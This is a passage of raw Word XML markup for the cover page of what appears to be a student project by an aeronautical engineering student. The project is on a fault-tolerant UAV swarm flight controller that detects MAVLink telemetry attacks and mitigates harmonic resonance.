                      <v:path arrowok="t" textboxrect="0,0,118,275"/>
                    </v:shape>
                    <v:shape id="Freeform 10" o:spid="_x0000_s1046" style="position:absolute;top:941760;width:84600;height:501480;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0oQxgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvQv/DMgUvopvmICXNKtJWkB6kVWnsbchOk2B2NmS3Gv+9cyh4m+G9ee+bfDm4Vp2pD41nA0+z&#10;BBRx6W3DlYHDfj19BhUissXWMxm4UoDl4mGUY2b9hb/ovIuVkhAOGRqoY+wyrUNZk8Mw8x2xaL++&#10;dxhl7Stte7xIuGt1miRz7bBhaaixo9eaytPuzxkoJqn/Pg6fW35PdSy2Px/rt2JuzPhxWL2AijTE&#10;u/n/emMFX2DlFxlAL24AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEASJdKEMYAAADbAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,l16,72r4,49l18,112,,31,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,20,121"/>
                    </v:shape>
                    <v:shape id="Freeform 12" o:spid="_x0000_s1047" style="position:absolute;left:84960;top:1443960;width:668520;height:2667600;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sVmtwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4L+x/CLOxN060gbjVKKYh69LHocWzGtthMuk1W6783guBtPr7nTOedqcWVWldZVvA9iEAQ51ZX&#10;XCjY7xb9MQjnkTXWlknBnRzMZx+9KSba3nhD160vRAhhl6CC0vsmkdLlJRl0A9sQB+5sW4M+wLaQ&#10;usVbCDe1jKNoJA1WHBpKbCgrKb9s/42C3+iU5se/ej0cdsuYs9UhKypW6uuzSycgPHX+LX65VzrM&#10;/4HnL+EAOXsAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAL7FZrcAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m,l11,46r11,83l36,211r19,90l76,389r27,87l123,533r21,55l155,632r3,11l142,608,118,544,95,478,69,391,47,302,29,212,13,107,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,158,643"/>
                    </v:shape>
                    <v:shape id="Freeform 13" o:spid="_x0000_s1048" style="position:absolute;left:787320;top:4090680;width:139680;height:294120;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bZO6vwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NisIw&#10;EL4LvkMYYS+iqa4sUk1FxAVhEVn1AYZmbEubSU2i7b795iB4/Pj+15veNOJJzleWFcymCQji3OqK&#10;CwXXy/dkCcIHZI2NZVLwRx422XCwxlTbjn/peQ6FiCHsU1RQhtCmUvq8JIN+alviyN2sMxgidIXU&#10;DrsYbho5T5IvabDi2FBiS7uS8vr8MArc1pxqlIc7Lnj/2Y2PP/oydkp9jPrtCkSgPrzFL/dBK5jH&#10;9fFL/AEy+wcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBSbZO6vwAAANsAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m,l33,71r-9,l11,36,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,33,71"/>
                    </v:shape>
                    <v:shape id="Freeform 14" o:spid="_x0000_s1049" style="position:absolute;left:68040;top:1240200;width:63000;height:393840;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OkEIwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeIK3ml2R0q5GEaGglwWth3p7bp6bxc3LkqTu+u9NodDjMDPfMMv1YFtxJx8axwryaQaC&#10;uHK64VrB6evz9R1EiMgaW8ek4EEB1qvRyxIL7Xo+0P0Ya5EgHApUYGLsCilDZchimLqOOHlX5y3G&#10;JH0ttcc+wW0rZ1n2Ji02nBYMdrQ1VN2OP1aB+yhL/218vT+7Jt/l8015uvRKTcbDZgEi0hD/w3/t&#10;nVYwy+H3S/oBcvUEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAEzpBCMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l8,37r,4l15,95,4,49,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,15,95"/>
                    </v:shape>
                    <v:shape id="Freeform 15" o:spid="_x0000_s1050" style="position:absolute;left:631080;width:1701000;height:3243600;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cj5oxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvhX6H8Aq9FE26iMhqFCu09CAU/6HHx+a5u3Tzsiaprt/eFASPw8z8hpnMOtuIM/lQO9bw3lcg&#10;iAtnai41bDefvRGIEJENNo5Jw5UCzKbPTxPMjbvwis7rWIoE4ZCjhirGNpcyFBVZDH3XEifv6LzF&#10;mKQvpfF4SXDbyEypobRYc1qosKVFRcXv+s9q2C9Xi58vv928nT7mu0aeDkoNDlq/vnTzMYhIXXyE&#10;7+1voyHL4P9L+gFyegMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDdcj5oxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m402,r,1l363,39,325,79r-35,42l255,164r-44,58l171,284r-38,62l100,411,71,478,45,546,27,617,13,689,7,761r,21l,765r1,-4l7,688,21,616,40,545,66,475,95,409r35,-66l167,281r42,-61l253,163r34,-43l324,78,362,38,402,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,402,782"/>
                    </v:shape>
                    <v:shape id="Freeform 16" o:spid="_x0000_s1051" style="position:absolute;left:631080;top:3277080;width:156240;height:812880;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8X0rwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvhbyD2EBvjRy7DYkTJYRAf26maR5gsTa2ibUykmKrb18VCj0OM/MNsztE04uRnO8sK1guMhDE&#10;tdUdNwouX69PaxA+IGvsLZOCb/Jw2M8edlhqO/EnjefQiARhX6KCNoShlNLXLRn0CzsQJ+9qncGQ&#10;pGukdjgluOllnmUrabDjtNDiQKeW6tv5bhS8v1XF+OKysHquZIy3jevw6JR6nMfjFkSgGP7Df+0P&#10;rSAv4PdL+gFy/wMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA48X0rwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,l6,15r1,3l12,80r9,54l33,188r4,8l22,162,15,146,5,81,1,40,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,37,196"/>
                    </v:shape>
                    <v:shape id="Freeform 17" o:spid="_x0000_s1052" style="position:absolute;left:753840;top:4111560;width:130680;height:273600;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blRQwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvBb9DeEJvmlWk6moUqQiFnvwHentunpvFzcuSpLp+e1Mo9DjMzG+Y+bK1tbiTD5VjBYN+BoK4&#10;cLriUsFhv+lNQISIrLF2TAqeFGC56LzNMdfuwVu672IpEoRDjgpMjE0uZSgMWQx91xAn7+q8xZik&#10;L6X2+EhwW8thln1IixWnBYMNfRoqbrsfq8BPzrfpeHApsufqtF4fDZ6+Ayr13m1XMxCR2vgf/mt/&#10;aQXDEfx+ST9ALl4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAW25UUMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l31,66r-7,l,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,31,66"/>
                    </v:shape>
                    <v:shape id="Freeform 18" o:spid="_x0000_s1053" style="position:absolute;left:631080;top:3173760;width:29160;height:178560;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o2/yxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8oTe6sbQikZXkRapJ6Hxz/mRfSbR7Nslu41pP31XKHgcZuY3zGLVm0Z01PrasoLxKAFB&#10;XFhdc6ngsN+8TEH4gKyxsUwKfsjDajl4WmCm7Y2/qMtDKSKEfYYKqhBcJqUvKjLoR9YRR+9sW4Mh&#10;yraUusVbhJtGpkkykQZrjgsVOnqvqLjm30bB1n12k8sx75Pdh3udbcbm95CelHoe9us5iEB9eIT/&#10;21utIH2D+5f4A+TyDwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMKjb/LEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l7,17r,26l6,40,,25,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,7,43"/>
                    </v:shape>
                    <v:shape id="Freeform 19" o:spid="_x0000_s1054" style="position:absolute;left:694080;top:3882960;width:194400;height:501480;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zw/rxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8gQvpW60EEt0FalIC1780x68PbLPJJp9m2a3Sfz2riB4HGbmN8xs0ZlSNFS7wrKC0TAC&#10;QZxaXXCm4OewfvsA4TyyxtIyKbiSg8W89zLDRNuWd9TsfSYChF2CCnLvq0RKl+Zk0A1tRRy8k60N&#10;+iDrTOoa2wA3pRxHUSwNFhwWcqzoM6f0sv83Cr70aHV+/Z20RydXW795j/8aEys16HfLKQhPnX+G&#10;H+1vrWAcw/1L+AFyfgMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDnzw/rxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,l7,16,22,50,33,86r13,35l45,121,14,55,11,44,,xe" fillcolor="#0e2841" strokecolor="#0e2841" strokeweight="0">
                      <v:fill opacity="13107f"/>
                      <v:stroke opacity="13107f"/>
                      <v:path arrowok="t" textboxrect="0,0,46,121"/>
                    </v:shape>
                  </v:group>
                </v:group>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="26" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2E929936" wp14:editId="490C8029">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3175635</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9408795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3402330" cy="564515"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Text Box 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3402330" cy="564515"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="445F6064" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="156082"/>
                                <w:sz w:val="52"/>
                                <w:szCs w:val="52"/>
                              </w:rPr>
                              <w:t>LOVEJOY MAKANGANI</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1A01C348" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:caps/>
                                <w:color w:val="595959"/>
                              </w:rPr>
                              <w:t>AERONAUTICAL ENGINEERING STUDENT</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="2E929936" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 28" o:spid="_x0000_s1055" type="#_x0000_t202" style="position:absolute;margin-left:250.05pt;margin-top:740.85pt;width:267.9pt;height:44.45pt;z-index:26;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;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zzbqmQEAAC8DAAAOAAAAZHJzL2Uyb0RvYy54bWysUttu2zAMfR/QfxD0vshJmmIw4hTbihQD&#10;hm1Auw+QZSkWIIsCpcbO349SrujehvlBJkX6+JxDrh+nwbG9xmjBN3w+qzjTXkFn/a7hv1+3Hz9x&#10;FpP0nXTgdcMPOvLHzd2H9RhqvYAeXKeREYiP9Rga3qcUaiGi6vUg4wyC9lQ0gINMlOJOdChHQh+c&#10;WFTVgxgBu4CgdIx0+3Qs8k3BN0ar9NOYqBNzDSduqZxYzjafYrOW9Q5l6K060ZD/wGKQ1tNPL1BP&#10;Mkn2hvYvqMEqhAgmzRQMAoyxShcNpGZevVPz0sugixYyJ4aLTfH/waof+5fwC1mavsBEA8yGjCHW&#10;kS6znsngkN/ElFGdLDxcbNNTYooul/fVYrmkkqLa6uF+NV9lGHH9OmBMzxoGloOGI42luCX332M6&#10;tp5b8s8iONttrXMlwV371SHbSxrhtjwn9Js2ceWcozS1E7PdjZ4WugPJdN88mZcX4RzgOWjPgfSq&#10;B1qRtlD08PktgbGFZsY+IpG8nNBUitDTBuWx3+al67rnmz8AAAD//wMAUEsDBBQABgAIAAAAIQCc&#10;M7SV4gAAAA4BAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLCkj2yhNJ5g0Tpsm&#10;Bg/gtV5baJLSpFt5e7wT3Gz9n35/zpajbcWJ+tB4ZyCZKBDkCl82rjLw8b6+W4AIEV2JrXdk4IcC&#10;LPPrqwzT0p/dG532sRJc4kKKBuoYu1TKUNRkMUx8R46zo+8tRl77SpY9nrnctvJeqZm02Di+UGNH&#10;q5qKr/1gDWw+9S7sivXxW/vXF5wOq+24aYy5vRmfn0BEGuMfDBd9VoecnQ5+cGUQrQGtVMIoBw+L&#10;ZA7igqipfgRx4EnP1Qxknsn/b+S/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAADPNuqZ&#10;AQAALwMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAJwz&#10;tJXiAAAADgEAAA8AAAAAAAAAAAAAAAAA8wMAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAACBQAAAAA=&#10;" o:allowincell="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="445F6064" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="NoSpacing"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="156082"/>
                          <w:sz w:val="52"/>
                          <w:szCs w:val="52"/>
                        </w:rPr>
                        <w:t>LOVEJOY MAKANGANI</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1A01C348" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="NoSpacing"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:caps/>
                          <w:color w:val="595959"/>
                        </w:rPr>
                        <w:t>AERONAUTICAL ENGINEERING STUDENT</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E546CD8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:suppressAutoHyphens w:val="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="7F9D9309" wp14:editId="5B1EC0EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2768600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1873250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4565650" cy="1898650"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28" name="Text Box 30"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4565650" cy="1898650"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="27E1B681" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>A FAULT TOLERANT CYBER PHYSICAL FLIGHT CONTROLLER DETECTING MAVLINK TELEMENTRY ATTACKS AND MITIGATING HARMONIC REASONANCE IN UAV SWARMS</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="192335ED" w14:textId="3987BE3D" w:rsidR="005D7421" w:rsidRDefault="002C1552">
                            <w:pPr>
                              <w:pStyle w:val="Normal1"/>
                              <w:spacing w:before="120"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:i/>
                                <w:iCs/>
                                <w:color w:val="404040"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>UAV drone technology</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7F9D9309" id="Text Box 30" o:spid="_x0000_s1056" type="#_x0000_t202" style="position:absolute;margin-left:218pt;margin-top:147.5pt;width:359.5pt;height:149.5pt;z-index:25;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zWqNmAEAADADAAAOAAAAZHJzL2Uyb0RvYy54bWysUlGL2zAMfh/sPxi/r27LdnSh6bHt6BiM&#10;bXC7H+A4dmOwLSP7mvTfT3ab9tjexiWgSJby+fskbe8n79hRY7IQWr5aLDnTQUFvw6HlT7/37zac&#10;pSxDLx0E3fKTTvx+9/bNdoyNXsMArtfICCSkZowtH3KOjRBJDdrLtICoAyUNoJeZQjyIHuVI6N6J&#10;9XJ5J0bAPiIonRKdPpyTfFfxjdEq/zQm6cxcy4lbrhar7YoVu61sDijjYNWFhvwPFl7aQJdeoR5k&#10;luwZ7T9Q3iqEBCYvFHgBxlilqwZSs1r+peZxkFFXLdScFK9tSq8Hq34cH+MvZHn6DBMNsDRkjKlJ&#10;dFj0TAZ9+RJTRnlq4enaNj1lpujw/Yc7eimlKLfafNyUgHDE7feIKX/V4FlxWo40l9ouefye8rl0&#10;Lim3JXC231vnaoCH7otDdpQ0w319LugvysSNdPHy1E3M9i1fz4I66E+k030L1L2yCbODs9PNjgxq&#10;ANqRM8UAn54zGFtpFuwzEskrAY2lCr2sUJn7y7hW3RZ99wcAAP//AwBQSwMEFAAGAAgAAAAhAP5c&#10;50XhAAAADAEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFwQdRqaqE3jVNDCrRxa&#10;qp7deEki4nVkO0369zgnuM1oR7Nv8s2oW3ZF6xpDAuazCBhSaVRDlYDT18fzEpjzkpRsDaGAGzrY&#10;FPd3ucyUGeiA16OvWCghl0kBtfddxrkra9TSzUyHFG7fxmrpg7UVV1YOoVy3PI6ilGvZUPhQyw63&#10;NZY/x14LSHe2Hw60fdqd3vfys6vi89vtLMTjw/i6BuZx9H9hmPADOhSB6WJ6Uo61AhYvadjiBcSr&#10;JIgpMU8mdRGQrBYR8CLn/0cUvwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAHzWqNmAEA&#10;ADADAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD+XOdF&#10;4QAAAAwBAAAPAAAAAAAAAAAAAAAAAPIDAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;AAUAAAAA&#10;" o:allowincell="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="27E1B681" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="NoSpacing"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>A FAULT TOLERANT CYBER PHYSICAL FLIGHT CONTROLLER DETECTING MAVLINK TELEMENTRY ATTACKS AND MITIGATING HARMONIC REASONANCE IN UAV SWARMS</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="192335ED" w14:textId="3987BE3D" w:rsidR="005D7421" w:rsidRDefault="002C1552">
                      <w:pPr>
                        <w:pStyle w:val="Normal1"/>
                        <w:spacing w:before="120"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="404040"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>UAV</w:t>
                      </w:r>
                      <w:r w:rsidR="00000000">
                        <w:rPr>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="404040"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> drone technology</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E06F6F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:suppressAutoHyphens w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781FF4C6" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E2841"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E2841"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
    </w:p>
